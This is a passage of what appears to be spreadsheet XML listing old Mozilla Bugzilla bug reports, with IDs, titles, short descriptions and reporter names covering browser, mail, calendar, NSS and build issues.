    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4.1) Gecko/20030906
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4.1) Gecko/20030906
if i select more than one taks in the task-list and change priority or progress
only the last selected item is affected. It should be affect all selected items!
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>die.socke</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-375253</t>
  </si>
  <si>
    <t>AMO OpenSearch does not work</t>
  </si>
  <si>
    <t>The AMO search plugin offered on every page does not install properly. It attempts to install from https://addons.mozilla.org/firefox/AMOSearch.xml which is missing the locale.</t>
  </si>
  <si>
    <t>SEAMONKEY-50906</t>
  </si>
  <si>
    <t>|copy_string| will never terminate nsAlgorithm.h line 73</t>
  </si>
  <si>
    <t>To reproduce select the text in the urlbar then start typing in some text.
It goes into an Assert loop and beeps like mad at me . . .!
###!!! Break: at file ../../dist/include/nsAlgorithm.h line 73
###!!! ASSERTION: |copy_string| will never terminate: 'count_copied &gt; 0' file
../../dist/include/nsAlgorithm.h line 73
But the fix for this is easy.
Just don't type into the URL bar. -)
--pete</t>
  </si>
  <si>
    <t>BUGZILLA-95743</t>
  </si>
  <si>
    <t>submitting changes with login unsets roles checkboxes</t>
  </si>
  <si>
    <t>Submit a change while not logged in then log in to an account with access to at
least one bug group.  The roles checkboxes that govern whether or not the
reporter assignee qa contact and cc list can always see the bug get unset.
This is because process_bug assumes the user saw those checkboxes and unset them
if the user has access to a bug group but the user would not have seen those
checkboxes if they were not logged in when initially viewing the bug.</t>
  </si>
  <si>
    <t>CORE-283545</t>
  </si>
  <si>
    <t>OOM crash [@ nsFTPDirListingConv::OnDataAvailable]</t>
  </si>
  <si>
    <t>checking only some allocations isn't enough :)</t>
  </si>
  <si>
    <t>BUGZILLA-69267</t>
  </si>
  <si>
    <t>Add the ability to deactivate keywords</t>
  </si>
  <si>
    <t>You should have the ability to specify a keyword can no longer be added to bugs
without actually having to remove the keyword.</t>
  </si>
  <si>
    <t>dylan</t>
  </si>
  <si>
    <t>CORE-436925</t>
  </si>
  <si>
    <t>THREADSAFE nsCharsetConverterManager uses NS_CHARSETALIAS_CONTRACTID (nothreadsafe) from a random thread - triggered by Expired cert and nsDateTimeFormat</t>
  </si>
  <si>
    <t>Created attachment 323441
stack trace
Steps to reproduce:
1. Load a page with an expired cert such as https://kuix.de:9443/ or https://dl.comp.nus.edu.sg/.
Result: 
###!!! ASSERTION: nsMacLocale not thread-safe: '_mOwningThread.GetThread() == PR_GetCurrentThread()' file /Users/jruderman/central/mozilla/intl/locale/src/mac/nsMacLocale.cpp line 220
###!!! ASSERTION: nsPlatformCharset not thread-safe: '_mOwningThread.GetThread() == PR_GetCurrentThread()' file /Users/jruderman/central/mozilla/intl/uconv/src/nsMacCharset.cpp line 55
###!!! ASSERTION: nsCharsetAlias2 not thread-safe: '_mOwningThread.GetThread() == PR_GetCurrentThread()' file /Users/jruderman/central/mozilla/intl/uconv/src/nsCharsetAliasImp.cpp line 53</t>
  </si>
  <si>
    <t>SEAMONKEY-96176</t>
  </si>
  <si>
    <t>Access to rdf localstore is  wrong.</t>
  </si>
  <si>
    <t>rdf:local-store not rdf:localstore
talking to waterson it is supposed to be rdf:local-store not 
rdf:localstore
/xpfe/browser/resources/content/sessionHistoryUI.js line 32 -- var localstore 
= rdf.GetDataSource(rdf:localstore)
/xpfe/components/urlbarhistory/src/nsUrlbarHistory.cpp line 98 -- res = 
gRDFService-&gt;GetDataSource(rdf:localstore getter_AddRefs(mDataSource))</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-102399</t>
  </si>
  <si>
    <t>Scrolling boxes show HTML code instead of rendering</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Macintosh U PPC en-US rv:0.9.4+) Gecko/20010928
BuildID:    2001092813
The scrolling boxes on the front page show HTML code scrolling instead of
rendering the HTML properly.
Reproducible: Always
Steps to Reproduce:
1. Go to site.
Actual Results:  Scrolling boxes no rendered
Expected Results:  Scrolling boxes rendered</t>
  </si>
  <si>
    <t>CORE-94831</t>
  </si>
  <si>
    <t>convert mozilla/intl/locale/src/nsLocalModule to generic module</t>
  </si>
  <si>
    <t>Need to convert this to a generic module to get static build to work right.</t>
  </si>
  <si>
    <t>THUNDERBIRD-286063</t>
  </si>
  <si>
    <t>When forwarding a message with more than one file attached just one file is attached on the forwarded message</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.6) Gecko/20050223 Firefox/1.0.1
Build Identifier: version 1.0.1 (20050309)
When I try to forward a message with more than one attach the forwarded message
have just one file attached.
Reproducible: Always
Steps to Reproduce:
1.Open a message with more than one file attached
2.Click the forward button
3.See that only one file are attached to the message
Actual Results:  
Only one file is attached
Expected Results:  
All files of the original message attached no the new message
Im using inline attach on the forward.</t>
  </si>
  <si>
    <t>matafagafo</t>
  </si>
  <si>
    <t>NSS-130699</t>
  </si>
  <si>
    <t>PK11_ListPublicKeysInSlot returns NULL key if slot contains token symmetric key</t>
  </si>
  <si>
    <t>The internal token stores token symmetric keys by creating a dummy public key in
the database. PK11_ListPublicKeysInSlot will come across this key try to
extract it with PK11_ExtractPublicKey get back NULL from this function because
it's not a real public key and then store NULL in the public key list.
(pk11cert.c:3622)
The function should check for the NULL from ExtractPublicKey and should not
enter it in the list in that case.
I can work around this by checking for NULL public keys in the list and skipping
them.</t>
  </si>
  <si>
    <t>NSPR-132208</t>
  </si>
  <si>
    <t>Implement PR_SendFile() with sendfile() and TCP_CORK</t>
  </si>
  <si>
    <t>Linux 2.2 kernel has the sendfile() system call and the
TCP_CORK socket option.  We should implement PR_SendFile()
with these.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-71948</t>
  </si>
  <si>
    <t>[RFE] Blackconnect needs a serviceManager</t>
  </si>
  <si>
    <t>Blackconnect has no way of accessing singleton references to objects</t>
  </si>
  <si>
    <t>blackconnect</t>
  </si>
  <si>
    <t>jevans12</t>
  </si>
  <si>
    <t>CORE-41066</t>
  </si>
  <si>
    <t>JS_ExecuteScriptPart does not cooperate with JS debugger</t>
  </si>
  <si>
    <t xml:space="preserve">From the URL:
1) i set a callback with JSD_SetThrowHook()
2) i executed a compiled script with JS_ExecuteScriptPart( .. JSEXEC_MAIN )
.
3) the JSD throw callback was not invoked on 'throw'.
4) this did work with JS_ExecuteScript
i looked inside the code. if i understood it correctly:
1) JSD uses JS_SetNewScriptHook() and JS_SetDestroyScriptHook() to set its
own callbacks.
2) JS_ExecuteScriptPart executes using a temporary JSScript object.
3) JS_ExecuteScriptPart does not call the callbacks (from step 1) on the
temporary JSScript.
can i use JSD_ScriptCreated() and JSD_ScriptDestroyed() somehow?
             itaj sherman </t>
  </si>
  <si>
    <t>TOOLKIT-527622</t>
  </si>
  <si>
    <t>xpcshell-tests: Intermittent failure in test_sorting.js</t>
  </si>
  <si>
    <t>Reasonably sure this isn't the first time I've seen it though of course depending on other people to actually file the things that happen during their pushes is a bad bet.
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox-Unittest/1257802416.1257808204.23538.gz&amp;fulltext=1
WINNT 5.2 mozilla-central debug test everythingelse on 2009/11/09 13:33:36  
Sadly my connection isn't good enough to manage to load a full build log at the moment so I can't tell you what's hiding behind
TEST-UNEXPECTED-FAIL | e:\builds\moz2_slave\mozilla-central-win32-debug-unittest-everythingelse\build\xpcshell\tests\test_places\queries\test_sorting.js | test failed (with xpcshell return code: 0) see following log:
but perhaps once they don't have to file it someone will choose not to just ignore the orange and will copy-paste the details.</t>
  </si>
  <si>
    <t>FIREFOX-526663</t>
  </si>
  <si>
    <t>[Win7] Firefox shortcut icon remains in taskbar after uninstalling application</t>
  </si>
  <si>
    <t>Created attachment 410401
Screenshot of shortcut window
Seen while running the latest 1.9.2 nightly.
STR:
1. Install Namoroka build in the default directory.
2. Pin the app to the taskbar.
2. Run the uninstaller.
See the attached screenshot. We leave an icon behind in the taskbar after the uninstaller is run.
I tried the same STR using Google Chrome and that app did not leave anything behind.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-254921</t>
  </si>
  <si>
    <t>Camino Trunk is vulnerable to frame spoofing</t>
  </si>
  <si>
    <t>Camino nightlies are vulnerable to this frame spoof. Camino Branch 0.8 is not.
seems related to http://bugzilla.mozilla.org/show_bug.cgi?id=246448
adding jst in cc because he fixed the above bug.</t>
  </si>
  <si>
    <t>CORE-392883</t>
  </si>
  <si>
    <t>ActionMonkey: remove gcThingFlags</t>
  </si>
  <si>
    <t>They're just taking up space.
* The type bits: use the vtable.  jsdoubles don't have a vtable so they'll need a workaround. (Note: The cycle collector sneakily uses these bits in nsXPConnect.cpp it will be changed too.)
* The GCF_LOCK bit: mainly replaced by allowing MMgc to scan rt-&gt;gcLocksHash bug 389832. There is also a string optimization that uses this bit. It's yet to be determined what to do about that.
* The GCF_MUTABLE bit: move into JSString see bug 391290.
* The GCF_SYSTEM bit: move into JSObject. Details to be determined.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-431069</t>
  </si>
  <si>
    <t>verify-locales should support alphas</t>
  </si>
  <si>
    <t>verify-locales.pl currently only supports regular releases betas and RCs. If we want to ship locales for Alpha releases we need to make verify-locales support them.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-385933</t>
  </si>
  <si>
    <t>Create LDAP account for Nicolas Massart and give him SVN access</t>
  </si>
  <si>
    <t>Created attachment 269877
Public SSH key
Create SVN /Ldap account for :
Name: Nicolas Massart
email: mozilla@massart.org
SSH key: see attachment
mozilla@massart.org
This user will need subversion privs set for :
projects/mozilla-europe.org/trunk/fr/.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-498383</t>
  </si>
  <si>
    <t>Please QA and Sign the Seznam Partner Repack (3.0.11)</t>
  </si>
  <si>
    <t>Starting the QA review process on the 3.0.11 version of the Seznam partner distribution of Firefox.
The repack worksheet is located at:
https://wiki.mozilla.org/Partnering:Repacks:Firefox3:Seznam
Please note that the installers until QA'd and digitally signed are password protected. Distributions will be publicly available once they are QA'd and signed.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-268554</t>
  </si>
  <si>
    <t>If I open mozilla.org homepage/getfirefox.com page with IE 5/6 I've no option to download Firefox/Thunderbird 1.0</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
It seems platform sniffing code is broken with Microsoft Internet Explorer 5 for
Windows(I can't test other versions at this moment). The download link is not
displayed and the user experience is very frustrating: how is an IE user
supposed to switch if he can't download Firefox from the advertised location?
The long awaited 11/9 may turn into a 9/11...
Reproducible: Always
Steps to Reproduce:
1. Start IE (version 5)
2. Open http://www.getfirefox.com
3. Try to download Firefox
Actual Results:  
I can't find a single link pointing to Firefox download
Expected Results:  
There should be a link to download Firefox</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-36932</t>
  </si>
  <si>
    <t>WebConnect Applet not loading</t>
  </si>
  <si>
    <t>I am trying to load OpenConnect's Java applet from Netscape Version 6
You can duplicate this by going to JD3270.deere.com and clicking on the Default 
button.
I had to click the JD3270.deere.com button twice before the screen loaded.
Then I was unable to get the Java applet to load.
I can be reached at 309-765-5937 if you have questions.</t>
  </si>
  <si>
    <t>mowersricharda</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-342473</t>
  </si>
  <si>
    <t>disabled group displays by default</t>
  </si>
  <si>
    <t>A non-relevant group will display by default but any other XForms control bound to that same node will NOT display.  Yet a group will not display if xf|*:disabled {display:none} is specifically mentioned in the xhtml:style section of the document.
Doesn't look like this is a regression.  This bug existed in 0.5 (where default style for :disabled was introduced).  I'm guessing that somehow the *:disabled {display: none} rule isn't overridding the html|*:root group {display: block} rule in xforms.css</t>
  </si>
  <si>
    <t>MOZILLA_LABS-375430</t>
  </si>
  <si>
    <t>app_controller only detects rest parameter in POST</t>
  </si>
  <si>
    <t>The app_controller only detects rest parameter in POST not in GET. We might need to change it if we were to support simpler (i.e. real RESTful) HTTP GETs.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-467511</t>
  </si>
  <si>
    <t>Unable to add new entry to the Address Book in localized si gu-IN nn-NO beta1pre version</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 si rv:1.9.1b3pre) Gecko/20081130 Shredder/3.0b1pre
à¶œà·œà¶±à·” -&gt;à¶±à·€ -&gt;à¶½à·’à¶´à·’à¶± à¶´à·œà¶­à·š à¶´à·’à¶§à·”à·€à¶šà·Š (In English eq.  File -&gt;New-&gt; Address Book Card)
Under à·ƒà¶¸à·Šà¶¶à¶±à·Šà¶°à¶º (Contact)
When First and Last text boxes are filled the Display should be automatically filled up. But it is not happening in Sinhala Version and nothing happens when à·„à¶»à·’ (OK) button is clicked.
(I will separately attach two screen shots for Sinhala (si) version and equivalent En-US)
Reproducible: Always
Steps to Reproduce:
1.à¶œà·œà¶±à·” -&gt;à¶±à·€ -&gt;à¶½à·’à¶´à·’à¶± à¶´à·œà¶­à·š à¶´à·’à¶§à·”à·€à¶šà·Š (en-US eq. File-&gt;New-&gt;Address Book Card)with si
2.Fill up appropriate text boxes (First Last etc..)
3.Click à·„à¶»à·’(OK) Button
Actual Results:  
Nothing Happen.
Expected Results:  
When First and Last under Contact are filled Display should be automatically filled up.
A new record should be added to the address book.
The à·„à¶»à·’ (OK) button looks like dead. But an existing record can be deleted.</t>
  </si>
  <si>
    <t>rohana</t>
  </si>
  <si>
    <t>FIREFOX-355588</t>
  </si>
  <si>
    <t>View Dependencies extension not available/working for firefox 2</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20061005 Minefield/3.0a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20061005 Minefield/3.0a1
https://addons.mozilla.org/firefox/2214/
Contact: f.qu@queze.net
Reproducible: Always</t>
  </si>
  <si>
    <t>FIREFOX-803978</t>
  </si>
  <si>
    <t>Remove WinXP-specific downloads panel styling</t>
  </si>
  <si>
    <t>Created attachment 673693
patch
As of bug 764755 arrow panels use mostly the same layout across Windows versions downloads panel styling targeting Windows XP is either redundant or should be changed to cover all Windows versions.</t>
  </si>
  <si>
    <t>CALENDAR-482116</t>
  </si>
  <si>
    <t>Views are not updated after changing category color restart required</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b4pre) Gecko/20090307 Calendar/1.0pre
Views are not updated after changing category color restart required
Steps to Reproduce:
1. go to preference dialog and assign colors to categories
2. create events with that categories applied
3. go to preference dialog and change colors of the categories
4. check views
Actual Results:
The view refreshes but still shows the old categories colors. An application restart is required to take over the changes.
Expected Results:
The view refreshes and shows the new categories colors.
This used to work for both normal and escaped category names (see below) in Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b3pre) Gecko/20090226 Calendar/1.0pre.
category Birthday -&gt; preference calendar.category.color.birthday
category FuÃŸball  -&gt; preference calendar.category.color.fu-uxdf-ball</t>
  </si>
  <si>
    <t>CORE-377060</t>
  </si>
  <si>
    <t>Preferences window blanks during resize</t>
  </si>
  <si>
    <t>Since bug 355177 made the resizing nice and smooth the preferences window now goes completely blank during the resize. It looks fairly poor and when there is very little resizing to be done it has a horrible flicker like effect.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-262627</t>
  </si>
  <si>
    <t>links for stack frames should strip off ()</t>
  </si>
  <si>
    <t>The stack frames at the URL are linked to bugzilla queries for bugs containing
the string in the comments.  But the query fails because of the trailing (). 
The actual bug for the talkback ID is bug 262244 and it has the string
nsListBoxBodyFrame::OnContentRemoved (this=0x8e70354 aPresContext=0x8aa2388
aChildFrame=0x8f76548 aIndex=2).  If the () were stripped in the query it
would have found the bug.</t>
  </si>
  <si>
    <t>CORE-332239</t>
  </si>
  <si>
    <t>Saved xml content gives xml parsing error in this case</t>
  </si>
  <si>
    <t>See upcoming testcase.
To reproduce:
- Open testcase
- Save the testcase with Save Page As
- Open the saved page
Expected result:
The saved page should not give an xml parsing error.
Actual result:
XML parsing error.
This regressed between 2005-11-29 and 2005-11-30:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=all&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2005-11-29+06&amp;maxdate=2005-11-30+07&amp;cvsroot=%2Fcvsroot
I guess a regression from bug 301260?</t>
  </si>
  <si>
    <t>CORE-414076</t>
  </si>
  <si>
    <t>[FIX]Find previous does not wrap (reports Phrase not found)</t>
  </si>
  <si>
    <t>Created attachment 299327
testcase (see comment #0)
The Previous button on the find toolbar sometimes stops at the first match on the page and does not wrap. Steps to reproduce:
1. Load the attached testcase
2. Open find toolbar and search for elmar (without the quotes)
3. Press Next a few times observe that wrap around works
4. Press Prev a few times find stops at first match and reports
   Phrase not found
Searching for rss in the testcase wraps correctly in both directions.
Note that the structure of the HTML in the testcase is slightly broken: there is a DIV before the HTML element. This is the same as in the original page from which this testcase was derived. Fixing the HTML structure makes find previous work correctly.
Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9b3pre) Gecko/2008012404 Minefield/3.0b3pre ID:2008012404</t>
  </si>
  <si>
    <t>elmar.ludwig</t>
  </si>
  <si>
    <t>NSS-509440</t>
  </si>
  <si>
    <t>Add E-Tugra EBG Elektronik Sertifika Hizmet SaÄŸlayÄ±cÄ±sÄ± root certificate to NSS</t>
  </si>
  <si>
    <t>This bug requests inclusion in the NSS root certificate store of the following
certificate owned by E- Tugra.
Friendly name: 
EBG Elektronik Sertifika Hizmet SaÄŸlayÄ±cÄ±sÄ±
Certificate location: 
https://bugzilla.mozilla.org/attachment.cgi?id=380381
(will also attach)
SHA1 Fingerprint: 
8c:96:ba:eb:dd:2b:07:07:48:ee:30:32:66:a0:f3:98:6e:7c:ae:58
Trust flags: 
SSL email object signing
Test URL: 
https://webmail.takasbank.com.tr/
This CA has been assessed in accordance with the Mozilla project guidelines
and the root certificate has been approved for inclusion in bug 443653.
The next steps are as follows:
1) A representative of the CA must confirm that all the data in this bug is
correct and that the correct certificate(s) have been attached. They must also
specify what OS they would like to use to perform the verification below.
2) A Mozilla representative creates a test build of NSS with the new
certificate(s) and attaches nssckbi.dll to this bug. A representative of the
CA must download this drop it into a copy of Firefox and/or Thunderbird on the
OS in question and confirm (by adding a comment here) that the certificate(s)
have been correctly imported and that websites work correctly.
3) The Mozilla representative checks the certificate(s) into the NSS store and
marks the bug RESOLVED FIXED.
4) At some time after that various Mozilla products will move to using a
version of NSS which contains the certificate. This process is mostly under the
control of the release drivers for those products.</t>
  </si>
  <si>
    <t>CORE-398336</t>
  </si>
  <si>
    <t>Opening a very wide  freezes the entire OS</t>
  </si>
  <si>
    <t>Loading the testcase from Bug 398158 (https://bugzilla.mozilla.org/attachment.cgi?id=283018)(and clicking on this bar) freeze Trunk Builds and the entire mac system.
Its no regression from bug 398157 because Gran Paradiso Alpha 8 mac-builds and 2007100104 Minefield have also the same problem.</t>
  </si>
  <si>
    <t>CORE-436864</t>
  </si>
  <si>
    <t>XPath needs to support an 'object' type as a parameter and return type</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1 .NET CLR 1.1.4322 .NET CLR 2.0.50727)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9pre) Gecko/2008050115 Minefield/3.0pre
The XForms 1.1 spec defines several new XPath functions that rely on an 'object' type as a parameter or return value. The intent is to allow the author to pass any of the XPath data types (boolean number string nodeset) as well as return any type. The 'Choose' function is an example: http://www.w3.org/TR/xforms11/#fn-choose
The closet thing to an object is txINodeset since you can get a number string or boolean result from a Nodeset. However txXPCOMExtensionFunctionCall::evaluate looks at the type of the parameter and calls evaluateToNodeset/Boolean/String/etc. If the type of the parameter is declared to be txINodeset but the evaluation results in anything other than a nodeset NS_ERROR_XSLT_NODESET_EXPECTED is returned.
We need another type that can be anything just to get around the checking done by the various EvaluateTo methods. Note that the evaluation happens before the call to the XForms XPath processor so there is no way to work around the issue in the XForms code.
Reproducible: Always</t>
  </si>
  <si>
    <t>SEAMONKEY-116114</t>
  </si>
  <si>
    <t>Links from Address Cards must have same behaviour as for links from MailNews</t>
  </si>
  <si>
    <t>Right-click on a link to choose open in new windows should be possible in a
card on the e-mail-list.
I make a attachment to explain which links I mean.</t>
  </si>
  <si>
    <t>Tobias.Besemer</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-208664</t>
  </si>
  <si>
    <t>archavoda.org.il: slide show and news scroller are broken - document.all</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030529
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030529
The website of the Israeli Labour Party Archives uses document.all. As a result
many of its features are broken.
Reproducible: Always
Steps to Reproduce:
Open the above URL
Actual Results:  
- Under Virtual Museum there's a blank space
- News scroller is frozen
Expected Results:  
- Instead of a blank space there should be a slide show
- The news scroller should... scroll
Another problem with this site:
The search feature may seem as broken in Mozilla. It works fine if the user
presses the Find (×—×¤×©) icon but if the user presses Enter the wrong function
is used (index).
1. Open http://www.archavoda.org.il/avodaarch/Searching/index.asp
2. Enter the hebrew word Avoda - ×¢×‘×•×“×”
3. Press Enter
Actual Results: The results page only includes three columns - copy
name&amp;description and number of results. On further investigation this (rather
useless) page is the Index page (same as pressing the binoculars icon)
Expected Results: The results page should display 8 columns (much more
information). Compare with IE6.
Prog.</t>
  </si>
  <si>
    <t>CORE-91312</t>
  </si>
  <si>
    <t>TITLE texts should follow the same BiDi directionality as the source object</t>
  </si>
  <si>
    <t>The text inside tooltips which appear when hovering the mouse over an object
with a TITLE attribute should have the same BiDi directionality as the object
which had the TITLE attribute.
Can be demonstrated on www.msn.co.il on any news link which has mixed character
(e.g. HEBREW and a QUESTION MARK or HEBREW and ENGLISH).</t>
  </si>
  <si>
    <t>CORE-334555</t>
  </si>
  <si>
    <t>Translucent background doesn't paint correctly in print/print preview</t>
  </si>
  <si>
    <t>Steps to reproduce:
Print preview document with translucent png background on root element (75% alpha for my testcase I think).
Actual results:
The background under the content is darker.
Expected results:
The background should be consistent.
Testcase coming up.
The problem is in FindElementBackground the root content frame it finds the background for the root content despite the fact it has already been painted.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-320592</t>
  </si>
  <si>
    <t>tb 1.5 pa-IN trademarks review</t>
  </si>
  <si>
    <t>There are two entries in the pa-IN build that do not meet the trademarks
policy 
http://wiki.mozilla.org/L10n:Thunderbird_Trademark_Review namely
mailnews.start_page.url 	 chrome://messenger/locale/start.html
mailnews.hints_and_tips.url 	http://texturizer.net/thunderbird/
Please submit a patch and request approval-l10n.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-484670</t>
  </si>
  <si>
    <t>Branch Nightly Build For 20090322 failed with insufficient disk space to complete link</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b4pre) Gecko/20090321 Shiretoko/3.5b4pre Firefox/3.0.7
Build Identifier: 
The nightly build crashes.
Reproducible: Always</t>
  </si>
  <si>
    <t>NSS-88941</t>
  </si>
  <si>
    <t>backward compatibility test needs to run test scripts that match binaries</t>
  </si>
  <si>
    <t>right now the test scripts come from the tip the binaries from 3.3 this causes
problems when return codes are being changed.</t>
  </si>
  <si>
    <t>TESTING_GRAVEYARD-386992</t>
  </si>
  <si>
    <t>Sisyphus - sync misc changes</t>
  </si>
  <si>
    <t>Created attachment 271081
sync.patch
This bug will track the changes to Sisyphus required to get buildbot driven js test automation working. This first patch syncs the tree with my working copy.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-300716</t>
  </si>
  <si>
    <t>www.ccmove.com serves html as text/plain</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 zh-CN rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 zh-CN rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Visit http://www.ccmove.com/index_1/ the Firefox shows up the HTML code.
Reproducible: Always
Steps to Reproduce:
1. Visit http://www.ccmove.com/index_1/
2.
3.
Actual Results:  
the Firefox shows up the HTML code.
Expected Results:  
See the correct web page as MS IE can do</t>
  </si>
  <si>
    <t>w20048</t>
  </si>
  <si>
    <t>CORE-309433</t>
  </si>
  <si>
    <t>[FIX]tr children of tables don't register in the rows collection XHTML</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050908 Firefox/1.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050908 Firefox/1.4
tr children of table elements i.e. tr that aren't inside tbody thead or tfoot
elements aren't in the rows collection.
This is probably related to bug 309431.
Opera 8 has the correct behavior.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>THUNDERBIRD-304898</t>
  </si>
  <si>
    <t>View Certificates Manage CRLs and Device Manager dialog should be resizable window</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 ja-JP rv:1.7.11) Gecko/20050728
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 ja-JP rv:1.7.11) Gecko/20050728
When we press the following buttons
[Tools] -&gt; [Options...] -&gt; [Privacy] -&gt; [Security] -&gt; [View Certificates]
[Tools] -&gt; [Options...] -&gt; [Privacy] -&gt; [Security] -&gt; [Revocation Lists]
[Tools] -&gt; [Options...] -&gt; [Privacy] -&gt; [Security] -&gt; [Security Devices]
dialog window will be opened but they are not resizable.
They should be resizable windows.
http://lxr.mozilla.org/mozilla1.8/source/mail/components/preferences/privacy.js#138
In this script openSubDialog() method is used but they should use openWindow().
FYI: See Firefox's script:
http://lxr.mozilla.org/mozilla1.8/source/browser/components/preferences/advanced.js#71
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-167355</t>
  </si>
  <si>
    <t>non-inline document.write does not work in builds after 090522</t>
  </si>
  <si>
    <t>document.write gives a blank page in 090708.  This breaks a lot of scripts
including http://www.squarefree.com/htmledit/ and
http://www.squarefree.com/bookmarklets/pagelinks.html#linked_images.
Calling document.write clears the viewport but always leaves it blank.  
I'm using 090708 (talkback zip) on Windows XP.  Document.write works fine in 0831.</t>
  </si>
  <si>
    <t>TOOLKIT-391514</t>
  </si>
  <si>
    <t>Login Manager gets confused with password/PIN on usaa.com</t>
  </si>
  <si>
    <t>When I login to my bank site and use my pin if I tell Firefox to remember it the site tells me to use only numbers.  When I don't tell Firefox to remember it no problems.  I'll try to find the regression range which is between fixing of the million master password dialogs and the master password change it and lose passwords bugs.  I believe the bug fix for the master password change and lose passwords caused this but I'll find the regression.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-919917</t>
  </si>
  <si>
    <t>Extensions: SecureMail</t>
  </si>
  <si>
    <t>securemail's publickey field should be lazy-loaded</t>
  </si>
  <si>
    <t>currently the publickey field is loaded every time a user object is created.
as this field is mediumtext there's extra work for mysql to fetch the content however this field is rarely used.
we should lazy-load that field.</t>
  </si>
  <si>
    <t>MOZILLA_QA_GRAVEYARD-678178</t>
  </si>
  <si>
    <t>Update endurance shared module to reflect rename of micro-iterations to entities</t>
  </si>
  <si>
    <t>We need to update the endurance shared module to reflect rename of micro-iterations to entities.</t>
  </si>
  <si>
    <t>CORE-240627</t>
  </si>
  <si>
    <t>Add debug warning in Mozilla for Ctrl+Shift+[A-F] shortcuts</t>
  </si>
  <si>
    <t>In order to prevent problems like in Bug 186789 we should probably add an
assertion somewhere in Mozilla when a shortcut using Ctrl+Shift+[A-F] is
created. We could even ifdef out the assertion for non GTK2 builds.
This would make it easier to track down and reassign keyboard shortcuts which
are impossible to enter on GTK2 builds.</t>
  </si>
  <si>
    <t>pkwarren</t>
  </si>
  <si>
    <t>CALENDAR-343667</t>
  </si>
  <si>
    <t>Remove unused xpinstall installer bits</t>
  </si>
  <si>
    <t>Now that we're using NSIS the pieces from the old (and out of date) xpinstall installer can be removed.</t>
  </si>
  <si>
    <t>BUGZILLA-347521</t>
  </si>
  <si>
    <t>flagtypes.id should be an auto-increment field</t>
  </si>
  <si>
    <t>Using the same way I used in bug 322285 flagtypes.id shouldn't be set manually.</t>
  </si>
  <si>
    <t>TESTING-479352</t>
  </si>
  <si>
    <t>Hide big table of tests while tests are running in harness</t>
  </si>
  <si>
    <t>Bug 467672 added a bunch of tests that change the preferences for how numbers should render.  Sadly each preference change means we have to do a full reflow of the entire mochitest harness page.  This is a huge table and the reflows take a while (measured in tens of seconds _each_ in a debug build on my machine).  The test does 40+ such reflows.  Running through that set of tests over here took over 30 minutes easily.
Could we at least hide the huge table while running these tests?  Or something?  Or just generally hide it while doing an auto run?</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-316624</t>
  </si>
  <si>
